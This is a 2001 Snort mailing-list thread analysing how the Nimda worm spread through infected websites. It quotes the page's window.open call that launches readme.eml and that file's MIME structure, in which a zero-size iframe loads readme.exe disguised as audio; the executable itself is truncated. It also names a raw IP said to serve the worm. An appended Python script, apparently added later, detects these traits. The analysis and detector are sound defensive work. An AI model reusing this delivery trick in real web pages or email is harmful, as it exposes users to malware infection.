Snort mailing list archives

Re: nimda


From: "Sean Wheeler" <S.Wheeler () netprotect ch>
Date: Wed, 19 Sep 2001 13:46:08 +0200

Figuring out how this is happening:

A user noticed this same effect while browsing the net; I jumped on a Unix box and tried to figure out what was happening.

First I downloaded the main HTML page: wget xxx.xxx.xxx.xxx. The bottom of the index.html reads:
<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

Grabbed the readme.eml: wget xxx.xxx.xxx/readme.eml
and there she sits, the readme.exe inside the readme.eml.

It seems the *.eml extension is associated with Outlook, and thus the readme.eml is processed by Outlook when the JavaScript is executed, and the infection occurs just as if you had received it via e-mail.

Below is the first portion of the readme.eml file:

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
etc etc etc.......................

Pretty scary stuff!!

If this has been covered already, sorry for the repetition; I just got back from the chaos of international airports and have not got through all the mail yet.

Sean


  ----- Original Message ----- 
  From: Olensky, Sven 
  To: snort-users () lists sourceforge net 
  Sent: Tuesday, September 18, 2001 7:13 PM
  Subject: [Snort-users] nimda


  check this out http://208.193.197.48/

  that's one of the source IPs. Opens a second window, offers readme.exe as download.

  jesus.
    -----Original Message-----
    From: snortlst snortlst [mailto:snortlst () hotmail com]
    Sent: Tuesday, September 18, 2001 12:13 PM
    To: snort-users () lists sourceforge net
    Subject: [Snort-users] General info


    I couldn't find the explanation for pretty simple questions on the Snort site, so maybe you can clarify this:
    1. When you compare traffic to the rules, what are the options? Alerts are sent to syslog, or a database, or a file; that's OK, but can you, for example, drop the connection if it conflicts with Snort rules? What else can you do to malicious connections?
    2. I don't think MySQL is an option for me; is ACID simpler to configure than MySQL?
    3. Can I generate HTML reports if I log to ACID?



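The readme.eml dump above is enough to triage this kind of file statically instead of letting a mail client render it. The script below is an added example, not code from the thread or from the Snort project; it uses only the Python standard library. Its sample message is constructed from the headers quoted above (the base64 is the two lines shown, which decode to nothing more than a DOS stub header), and it flags the traits the dump shows: a zero-size iframe pointing at a cid: part, a part named readme.exe declared as audio/x-wav, a body that decodes to an "MZ" header, and the iframe's Content-ID resolving to that executable part. It also checks a page for the window.open("...eml") line found at the bottom of the infected index.html.

```python
"""Static triage of a Nimda-style readme.eml (added example, not from the thread).
Flags: a zero-size <iframe src=cid:...>, a .exe-named part under a media type,
a body decoding to a DOS/PE "MZ" header, and the iframe cid resolving to it."""
import email
import re
from email import policy
from typing import List

EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")

# Script line from the bottom of the infected index.html quoted in the thread.
WINDOW_OPEN_EML = re.compile(r'window\.open\s*\(\s*["\'][^"\']*\.eml["\']', re.I)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_CID = re.compile(r'\bsrc\s*=\s*["\']?cid:([^\s"\'>]+)', re.I)
ZERO_DIM = re.compile(r'\b(?:height|width)\s*=\s*["\']?0\b', re.I)

# Constructed sample: a page whose last line is the window.open() from the thread.
SAMPLE_INDEX_HTML = (
    "<html><body>welcome</body></html>\n"
    '<script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script>\n'
)

# Constructed sample mirroring the headers quoted in the thread. The base64 is
# the two lines shown there; they decode only to a DOS stub header, not a binary.
SAMPLE_EML = """MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
--====_ABC1234567890DEF_====--
"""


def page_launches_eml(html: str) -> bool:
    """True if page script opens a .eml in a new window (the thread's web-side trick)."""
    return bool(WINDOW_OPEN_EML.search(html))


def triage_eml(raw: str) -> List[str]:
    """Return finding codes for one .eml; an empty list means no trait matched."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[str] = []
    referenced_cids = set()   # cid: targets named by iframes in HTML parts
    executable_cids = set()   # Content-IDs of parts whose body starts with "MZ"
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        body = part.get_payload(decode=True) or b""   # undoes QP / base64
        if ctype == "text/html":
            html = body.decode(part.get_content_charset() or "latin-1", "replace")
            for tag in IFRAME_TAG.findall(html):
                m = SRC_CID.search(tag)
                if m:
                    referenced_cids.add(m.group(1))
                    if ZERO_DIM.search(tag):
                        findings.append(f"hidden-iframe-cid:{m.group(1)}")
            continue
        name = part.get_filename() or ""
        cid = str(part.get("Content-ID", "")).strip().strip("<>")
        # An executable name under a media type (audio/x-wav here) is the disguise.
        if name.lower().endswith(EXECUTABLE_EXTENSIONS) and not ctype.startswith("application/"):
            findings.append(f"type-name-mismatch:{name}:{ctype}")
        # Content sniffing: the quoted base64 starts with "TVqQ", which is "MZ".
        if body[:2] == b"MZ":
            findings.append(f"mz-header:{name or cid or ctype}")
            if cid:
                executable_cids.add(cid)
    for cid in sorted(referenced_cids & executable_cids):
        findings.append(f"iframe-loads-executable:{cid}")
    return findings
```

Calling triage_eml(SAMPLE_EML) returns the four finding codes in part order; on a plain text/plain message it returns an empty list. The type/name check deliberately ignores parts already declared application/*, since the point is the disagreement between the declared media type and the name, and the "MZ" sniff catches executables regardless of how they are labelled.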